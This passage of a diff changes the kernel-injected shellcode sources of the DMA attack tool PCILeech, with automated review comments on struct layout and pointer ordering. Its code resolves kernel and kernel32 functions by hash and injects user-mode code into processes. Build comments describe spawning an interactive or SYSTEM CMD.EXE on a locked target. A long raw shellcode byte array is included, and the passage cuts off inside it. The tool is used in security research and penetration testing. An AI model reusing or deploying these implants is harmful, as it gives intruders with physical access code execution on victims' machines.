+ DWORD i = 0, NAMES[25];
+ NAMES[i++] = H__stricmp;
+ NAMES[i++] = H_ExAllocatePool;
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_IoCreateDriver;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ NAMES[i++] = H_KeGetCurrentIrql;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmLoadSystemImage;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnloadSystemImage;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_RtlAnsiStringToUnicodeString;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_RtlFreeUnicodeString;
+ NAMES[i++] = H_RtlInitAnsiString;
+ NAMES[i++] = H_RtlInitUnicodeString;
+ NAMES[i++] = H_RtlZeroMemory;
+ NAMES[i++] = H_ZwClose;
+ NAMES[i++] = H_ZwCreateFile;
+ NAMES[i++] = H_ZwOpenFile;
+ NAMES[i++] = H_ZwQueryDirectoryFile;
+ NAMES[i++] = H_ZwQuerySystemInformation;
+ NAMES[i++] = H_ZwSetSystemInformation;
+ NAMES[i++] = H_ZwReadFile;
+ NAMES[i++] = H_ZwWriteFile;
+ while(i) {
+ i--;
+ *((PQWORD)fnk + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
}
}
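Review bot: The new loop at the end of InitializeKernelFunctions stores each resolved pointer positionally, `*((PQWORD)fnk + i) = ...`, so the NAMES[] order is now silently bound to the member order of KERNEL_FUNCTIONS, which is declared in wx64_common.h outside this hunk; the table it replaces wrote through `&fnk->member` and could not be misaligned. Nothing checks the pairing, and the companion hunk in wx64_common.h that moves ZwSetSystemInformation ahead of ZwReadFile looks like exactly the reordering needed to keep the two in step, which shows how easy the next drift will be. The 25 hashes listed do match `NAMES[25]`, but only by inspection; a one-line compile-time guard next to the array, `typedef char kfn_count_check[(sizeof(*fnk) == 25 * sizeof(QWORD)) ? 1 : -1];`, would catch an added, removed or reordered member (assuming the struct holds nothing but the function pointers, which I cannot confirm from here). A NULL result from PEGetProcAddressH is still stored unchecked, as it was before.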
diff --git a/pcileech_shellcode/wx64_common.h b/pcileech_shellcode/wx64_common.h
index 462c713..5ba34b8 100644
--- a/pcileech_shellcode/wx64_common.h
+++ b/pcileech_shellcode/wx64_common.h
@@ -29,30 +29,30 @@ typedef struct _ETHREAD *PETHREAD;
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
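Review bot: ReservedKMD grows from one QWORD to eight and ReservedFutureUse1 shrinks from 20 to 13, which keeps dataInExtraLength at 0x100 only by arithmetic the reader has to redo; the offsets are hand-maintained in comments and the VNR bump to 003 lives in a comment too, so a miscount here would silently desynchronise the page shared between pcileech and the injected KMD rather than fail to build. Since both sides compile this header, a compile-time check is cheap: `typedef char kmddata_layout_check[(offsetof(KMDDATA, dataInExtraLength) == 0x100 && offsetof(KMDDATA, dataOutExtraLength) == 0x200) ? 1 : -1];` after the struct, assuming <stddef.h> (or an equivalent FIELD_OFFSET macro) is available in this /kernel build, which I cannot see from the hunk. The struct continues past the hunk, so the 4096-byte total the header comment requires would deserve the same treatment at its closing brace.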
@@ -281,6 +281,11 @@ typedef struct tdKERNEL_FUNCTIONS {
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength);
+ NTSTATUS(*ZwSetSystemInformation)(
+ _In_ QWORD SystemInformationClass,
+ _In_ PVOID SystemInformation,
+ _In_ ULONG SystemInformationLength
+ );
NTSTATUS(*ZwReadFile)(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
@@ -292,11 +297,6 @@ typedef struct tdKERNEL_FUNCTIONS {
_In_opt_ PQWORD ByteOffset,
_In_opt_ PULONG Key
);
- NTSTATUS(*ZwSetSystemInformation)(
- _In_ QWORD SystemInformationClass,
- _In_ PVOID SystemInformation,
- _In_ ULONG SystemInformationLength
- );
NTSTATUS(*ZwWriteFile)(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
diff --git a/pcileech_shellcode/wx64_exec_user_c.c b/pcileech_shellcode/wx64_exec_user_c.c
index 3f61997..d5a45dd 100644
--- a/pcileech_shellcode/wx64_exec_user_c.c
+++ b/pcileech_shellcode/wx64_exec_user_c.c
@@ -1,6 +1,6 @@
// wx64_exec_user_c.c : usermode code to be injected into user process to spawn new processes.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
// compile with:
@@ -52,9 +52,7 @@ typedef struct tdUserShellConfig {
#define H_CreateProcessA 0x16b3fe72
#define H_CreateThread 0xca2bd06b
#define H_GetExitCodeProcess 0xac30ab74
-#define H_GetLastError 0x75da1966
#define H_LocalAlloc 0x4c0297fa
-#define H_LocalFree 0x5cbaeaf6
#define H_ReadFile 0x10fa6516
#define H_Sleep 0xdb2d49b0
#define H_WriteFile 0xe80a791f
@@ -93,14 +91,10 @@ typedef struct tdUserShellFunctions {
_In_ HANDLE hProcess,
_Out_ LPDWORD lpExitCode
);
- DWORD(*GetLastError)(void);
HLOCAL(*LocalAlloc)(
_In_ UINT uFlags,
_In_ SIZE_T uBytes
);
- HLOCAL(*LocalFree)(
- _In_ HLOCAL hMem
- );
BOOL(*ReadFile)(
_In_ HANDLE hFile,
_Out_ LPVOID lpBuffer,
@@ -171,17 +165,20 @@ PVOID PEGetProcAddressH(_In_ HMODULE hModuleIn, _In_ DWORD dwProcNameH)
VOID UserShellInitializeFunctions(_In_ HMODULE hModuleKernel32, _Out_ PUSERSHELL_FUNCTIONS fnu)
{
- fnu->CloseHandle = PEGetProcAddressH(hModuleKernel32, H_CloseHandle);
- fnu->CreatePipe = PEGetProcAddressH(hModuleKernel32, H_CreatePipe);
- fnu->CreateProcessA = PEGetProcAddressH(hModuleKernel32, H_CreateProcessA);
- fnu->CreateThread = PEGetProcAddressH(hModuleKernel32, H_CreateThread);
- fnu->GetExitCodeProcess = PEGetProcAddressH(hModuleKernel32, H_GetExitCodeProcess);
- fnu->GetLastError = PEGetProcAddressH(hModuleKernel32, H_GetLastError);
- fnu->LocalAlloc = PEGetProcAddressH(hModuleKernel32, H_LocalAlloc);
- fnu->LocalFree = PEGetProcAddressH(hModuleKernel32, H_LocalFree);
- fnu->ReadFile = PEGetProcAddressH(hModuleKernel32, H_ReadFile);
- fnu->Sleep = PEGetProcAddressH(hModuleKernel32, H_Sleep);
- fnu->WriteFile = PEGetProcAddressH(hModuleKernel32, H_WriteFile);
+ DWORD i = 0, NAMES[9];
+ NAMES[i++] = H_CloseHandle;
+ NAMES[i++] = H_CreatePipe;
+ NAMES[i++] = H_CreateProcessA;
+ NAMES[i++] = H_CreateThread;
+ NAMES[i++] = H_GetExitCodeProcess;
+ NAMES[i++] = H_LocalAlloc;
+ NAMES[i++] = H_ReadFile;
+ NAMES[i++] = H_Sleep;
+ NAMES[i++] = H_WriteFile;
+ while(i) {
+ i--;
+ *((PQWORD)fnu + i) = (QWORD)PEGetProcAddressH(hModuleKernel32, NAMES[i]);
+ }
}
BOOL UserShellIsProcessRunning(PUSERSHELL_DATA pd)
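Review bot: UserShellInitializeFunctions now writes the nine kernel32 pointers positionally into USERSHELL_FUNCTIONS via `*((PQWORD)fnu + i)`, so the struct's member order (its opening is outside this hunk; the tail in the hunk above ends GetExitCodeProcess, LocalAlloc, ReadFile) has to track NAMES[] exactly, and a stale or extra member would shift every later pointer into the wrong slot. `NAMES[9]` does match the nine hashes listed, but that holds only by inspection. A one-line guard catches drift at compile time: `typedef char usershell_fn_count_check[(sizeof(*fnu) == 9 * sizeof(QWORD)) ? 1 : -1];`, assuming the struct holds nothing but the function pointers, which I cannot confirm from the hunk.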
@@ -221,14 +218,12 @@ BOOL UserShellExec(_Inout_ PUSERSHELL_DATA pd)
}
// launch executable
if(!pd->fnu.CreateProcessA(NULL, pd->pCfg->szProcToStart, NULL, NULL, TRUE, pd->pCfg->fCreateProcess, NULL, NULL, psi, &pi)) {
- pd->fnu.LocalFree(psi);
return FALSE;
}
pd->hProcessHandle = pi.hProcess;
if(pd->pCfg->qwAddrConsoleBuffer) {
pd->fnu.CloseHandle(pi.hThread);
}
- pd->fnu.LocalFree(psi);
return TRUE;
}
@@ -309,7 +304,6 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
// create process
if(!UserShellExec(pd)) {
UserShellCleanup(pd);
- pd->fnu.LocalFree(pd);
return;
}
// Initalize console redirection #2/2
@@ -317,4 +311,4 @@ VOID c_EntryPoint(PBYTE pb, ULONG_PTR lpBaseKernel32)
pd->fnu.CreateThread(NULL, 0, &UserShellThreadWriter, pd, 0, NULL);
pd->fnu.CreateThread(NULL, 0, &UserShellThreadReader, pd, 0, NULL);
}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/wx64_pscreate.c b/pcileech_shellcode/wx64_pscreate.c
index b567e1e..f7e2a2d 100644
--- a/pcileech_shellcode/wx64_pscreate.c
+++ b/pcileech_shellcode/wx64_pscreate.c
@@ -6,19 +6,19 @@
//
// compile with (wx64_pscreate):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscreate.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscreate.exe "PROCESS CREATOR - SPAWN NEW PROCESSES ON TARGET! \n===============================================================\nREQUIRED OPTIONS: \n -s : Executable path including command line options. \n Example: '-s c:\windows\system32\cmd.exe'. \n -0 : Parent process PID to start new process from. \n Example '-0 0x0fe0'. \nOPTIONAL OPTIONS: \n -1 : CreateProcess creation flags (dwCreationFlags) as \n specified on MSDN. Hidden Window = 0x08000000 \n -2 : Redirect input - use to spawn interactive shell. \n Example: 0x01 \n -3 : Timeout in seconds. Default: 60. \n -4 : Boost (Windows 7 only): higher success ratio, but \n parent process may crash. Example 1. Default 0. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT =====%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n===============================================================\n"
//
// ALTERNATIVELY (wx64_pscmd):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscmd.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nonly work if the target system is locked and the login screen is\nvisible. If it takes time waiting - then please touch any key on\nthe target system. If the utility fails multiple times, please\ntry wx64_pscreate instead. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
//
// ALTERNATIVELY (wx64_pscmd_user):
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER /D_WIN7_COMPAT wx64_pscreate.c
// ml64 wx64_common_a.asm /Fewx64_pscmd_user.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
// shellcode64.exe -o wx64_pscmd_user.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE AS USER ON TARGET! \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nwill spawn a cmd.exe in the context of a random logged on user.\nThis will work even though the computer may be locked. If this\nutility fails multiple times, please try wx64_pscreate instead. \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS : 0x%08X \nADDITIONAL INFO : 0x%04X \n================================================================\n"
#include "wx64_common.h"
@@ -213,9 +213,6 @@ typedef struct tdKERNEL_FUNCTIONS2 {
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
- NTSTATUS(*ZwClose)(
- _In_ HANDLE Handle
- );
NTSTATUS(*ZwOpenProcess)(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
@@ -227,43 +224,45 @@ typedef struct tdKERNEL_FUNCTIONS2 {
VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2 fnk2)
{
- QWORD FUNC2[][2] = {
- { &fnk2->IoAllocateMdl, H_IoAllocateMdl },
- { &fnk2->KeInitializeApc, H_KeInitializeApc },
- { &fnk2->KeInsertQueueApc, H_KeInsertQueueApc },
- { &fnk2->KeStackAttachProcess, H_KeStackAttachProcess },
- { &fnk2->KeUnstackDetachProcess, H_KeUnstackDetachProcess },
- { &fnk2->MmAllocateContiguousMemory, H_MmAllocateContiguousMemory },
- { &fnk2->MmFreeContiguousMemory, H_MmFreeContiguousMemory },
- { &fnk2->MmMapLockedPagesSpecifyCache, H_MmMapLockedPagesSpecifyCache },
- { &fnk2->MmProbeAndLockPages, H_MmProbeAndLockPages },
- { &fnk2->ObDereferenceObject, H_ObDereferenceObject },
- { &fnk2->PsGetProcessImageFileName, H_PsGetProcessImageFileName },
- { &fnk2->PsLookupProcessByProcessId, H_PsLookupProcessByProcessId },
- { &fnk2->PsLookupThreadByThreadId, H_PsLookupThreadByThreadId },
- { &fnk2->RtlCreateUserThread, H_RtlCreateUserThread },
- { &fnk2->strnlen, H_strnlen },
- { &fnk2->ZwAllocateVirtualMemory, H_ZwAllocateVirtualMemory },
- { &fnk2->ZwClose, H_ZwClose },
- { &fnk2->ZwOpenProcess, H_ZwOpenProcess }
- };
- for(QWORD j = 0; j < (sizeof(FUNC2) / sizeof(QWORD[2])); j++) {
- *(PQWORD)FUNC2[j][0] = PEGetProcAddressH(qwNtosBase, (DWORD)FUNC2[j][1]);
+ DWORD i = 0, NAMES[18];
+ NAMES[i++] = H_IoAllocateMdl;
+ NAMES[i++] = H_KeInitializeApc;
+ NAMES[i++] = H_KeInsertQueueApc;
+ NAMES[i++] = H_KeStackAttachProcess;
+ NAMES[i++] = H_KeUnstackDetachProcess;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmMapLockedPagesSpecifyCache;
+ NAMES[i++] = H_MmProbeAndLockPages;
+ NAMES[i++] = H_ObDereferenceObject;
+ NAMES[i++] = H_PsGetProcessImageFileName;
+ NAMES[i++] = H_PsLookupProcessByProcessId;
+ NAMES[i++] = H_PsLookupThreadByThreadId;
+ NAMES[i++] = H_RtlCreateUserThread;
+ NAMES[i++] = H_strnlen;
+ NAMES[i++] = H_ZwAllocateVirtualMemory;
+ NAMES[i++] = H_ZwOpenProcess;
+ while(i) {
+ i--;
+ *((PQWORD)fnk2 + i) = (QWORD)PEGetProcAddressH(qwNtosBase, NAMES[i]);
}
}
//----------------------------------------------------------------------------------------------------------
-
-NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+// USER MODE SHELLCODE ASSIGNMENT BELOW:
+//----------------------------------------------------------------------------------------------------------
+#ifndef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
{
- unsigned char wx64_exec_user_bin[] = {
+ UNREFERENCED_PARAMETER(pk);
+ BYTE wx64_exec_user_bin[] = {
0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
- 0xec, 0x20, 0xe8, 0x69, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+ 0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
@@ -277,117 +276,130 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
- 0x81, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89,
- 0x08, 0x39, 0x8b, 0x98, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x98,
- 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x68, 0xff, 0x53, 0x08, 0x48, 0x8b,
- 0x4b, 0x60, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x4b, 0x70, 0xff, 0x53, 0x08,
- 0x48, 0x8b, 0x4b, 0x78, 0xff, 0x53, 0x08, 0x48, 0x8b, 0x83, 0x80, 0x00,
- 0x00, 0x00, 0x48, 0xb9, 0xac, 0xda, 0x37, 0x13, 0x00, 0x22, 0xda, 0xfe,
- 0x48, 0x89, 0x08, 0x48, 0x8b, 0x83, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89,
- 0x08, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3, 0xcc, 0x48, 0x89, 0x5c, 0x24,
- 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x70, 0xbe,
- 0x68, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x8b, 0xd6, 0x8d, 0x4e, 0xd8,
- 0xff, 0x53, 0x38, 0x48, 0x8b, 0xf8, 0x89, 0x30, 0x33, 0xf6, 0xc7, 0x40,
- 0x3c, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x13, 0x48, 0x39, 0xb2, 0x08,
- 0x01, 0x00, 0x00, 0x74, 0x18, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x89, 0x48,
- 0x58, 0x48, 0x8b, 0x4b, 0x78, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8b, 0x4b,
- 0x70, 0x48, 0x89, 0x48, 0x60, 0x48, 0x8b, 0x13, 0x48, 0x8d, 0x44, 0x24,
- 0x50, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45, 0x33, 0xc9, 0x48, 0x89, 0x7c,
- 0x24, 0x40, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x74, 0x24, 0x38, 0x33, 0xc9,
- 0x8b, 0x82, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x74, 0x24, 0x30, 0x89,
- 0x44, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x20, 0x01, 0x00, 0x00, 0x00, 0xff,
- 0x53, 0x18, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x44, 0x24, 0x50, 0x48,
- 0x89, 0x83, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x39, 0xb0,
- 0x08, 0x01, 0x00, 0x00, 0x74, 0x08, 0x48, 0x8b, 0x4c, 0x24, 0x58, 0xff,
- 0x53, 0x08, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x53,
- 0x40, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x8b, 0xc6, 0x49, 0x8b, 0x5b, 0x10,
- 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3, 0x5f, 0xc3, 0xcc, 0xcc, 0xcc,
- 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
- 0xfa, 0x48, 0x8b, 0xd9, 0xba, 0xfb, 0x97, 0xfd, 0x0f, 0xe8, 0x22, 0xfe,
- 0xff, 0xff, 0xba, 0x80, 0x8f, 0x0c, 0x17, 0x48, 0x89, 0x07, 0x48, 0x8b,
- 0xcb, 0xe8, 0x12, 0xfe, 0xff, 0xff, 0xba, 0x72, 0xfe, 0xb3, 0x16, 0x48,
- 0x89, 0x47, 0x08, 0x48, 0x8b, 0xcb, 0xe8, 0x01, 0xfe, 0xff, 0xff, 0xba,
- 0x6b, 0xd0, 0x2b, 0xca, 0x48, 0x89, 0x47, 0x10, 0x48, 0x8b, 0xcb, 0xe8,
- 0xf0, 0xfd, 0xff, 0xff, 0xba, 0x74, 0xab, 0x30, 0xac, 0x48, 0x89, 0x47,
- 0x18, 0x48, 0x8b, 0xcb, 0xe8, 0xdf, 0xfd, 0xff, 0xff, 0xba, 0x66, 0x19,
- 0xda, 0x75, 0x48, 0x89, 0x47, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0xce, 0xfd,
- 0xff, 0xff, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0x48, 0x89, 0x47, 0x28, 0x48,
- 0x8b, 0xcb, 0xe8, 0xbd, 0xfd, 0xff, 0xff, 0xba, 0xf6, 0xea, 0xba, 0x5c,
- 0x48, 0x89, 0x47, 0x30, 0x48, 0x8b, 0xcb, 0xe8, 0xac, 0xfd, 0xff, 0xff,
- 0xba, 0x16, 0x65, 0xfa, 0x10, 0x48, 0x89, 0x47, 0x38, 0x48, 0x8b, 0xcb,
- 0xe8, 0x9b, 0xfd, 0xff, 0xff, 0xba, 0xb0, 0x49, 0x2d, 0xdb, 0x48, 0x89,
- 0x47, 0x40, 0x48, 0x8b, 0xcb, 0xe8, 0x8a, 0xfd, 0xff, 0xff, 0xba, 0x1f,
- 0x79, 0x0a, 0xe8, 0x48, 0x89, 0x47, 0x48, 0x48, 0x8b, 0xcb, 0xe8, 0x79,
- 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x89, 0x47, 0x50,
- 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
- 0x48, 0x8b, 0xc1, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x89, 0x90,
- 0x00, 0x00, 0x00, 0xff, 0x50, 0x28, 0x33, 0xc9, 0x85, 0xc0, 0x74, 0x0f,
- 0x81, 0x7c, 0x24, 0x30, 0x03, 0x01, 0x00, 0x00, 0x75, 0x05, 0xb9, 0x01,
- 0x00, 0x00, 0x00, 0x8b, 0xc1, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0xcc,
- 0x48, 0x89, 0x5c, 0x24, 0x10, 0x56, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
- 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0xba, 0x00,
- 0x00, 0x00, 0xbe, 0x00, 0x08, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8, 0xa5,
- 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x48,
- 0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x8b, 0x88, 0x00, 0x00,
- 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x48, 0x10, 0x41, 0x8b,
- 0x51, 0x08, 0x81, 0xe1, 0xff, 0x07, 0x00, 0x00, 0x81, 0xe2, 0xff, 0x07,
- 0x00, 0x00, 0x3b, 0xca, 0x8b, 0xc2, 0x48, 0x8b, 0x4b, 0x68, 0x77, 0x08,
- 0x44, 0x8b, 0xc6, 0x44, 0x2b, 0xc2, 0xeb, 0x03, 0x45, 0x33, 0xc0, 0x49,
- 0x8d, 0x51, 0x68, 0x48, 0x03, 0xd0, 0x4c, 0x8d, 0x4c, 0x24, 0x40, 0xff,
- 0x53, 0x48, 0x85, 0xc0, 0x74, 0x56, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00,
- 0x00, 0x8b, 0x44, 0x24, 0x40, 0x48, 0x01, 0x41, 0x08, 0xeb, 0x1d, 0x83,
- 0xbb, 0x98, 0x00, 0x00, 0x00, 0x00, 0x74, 0x3c, 0x48, 0x8b, 0xcb, 0xe8,
- 0x2c, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x23, 0xb9, 0x0a, 0x00, 0x00,
- 0x00, 0xff, 0x53, 0x50, 0x48, 0x8b, 0x8b, 0x88, 0x00, 0x00, 0x00, 0x48,
- 0x8b, 0x83, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x08, 0x48, 0x2b,
- 0x48, 0x10, 0x48, 0x3b, 0xce, 0x73, 0xc8, 0x83, 0xbb, 0x98, 0x00, 0x00,
- 0x00, 0x00, 0x0f, 0x85, 0x4b, 0xff, 0xff, 0xff, 0x48, 0x8b, 0xcb, 0xe8,
- 0xe8, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x83, 0xc4,
- 0x30, 0x5e, 0xc3, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x30, 0x83, 0xb9,
- 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x0f, 0x84, 0x85, 0x00,
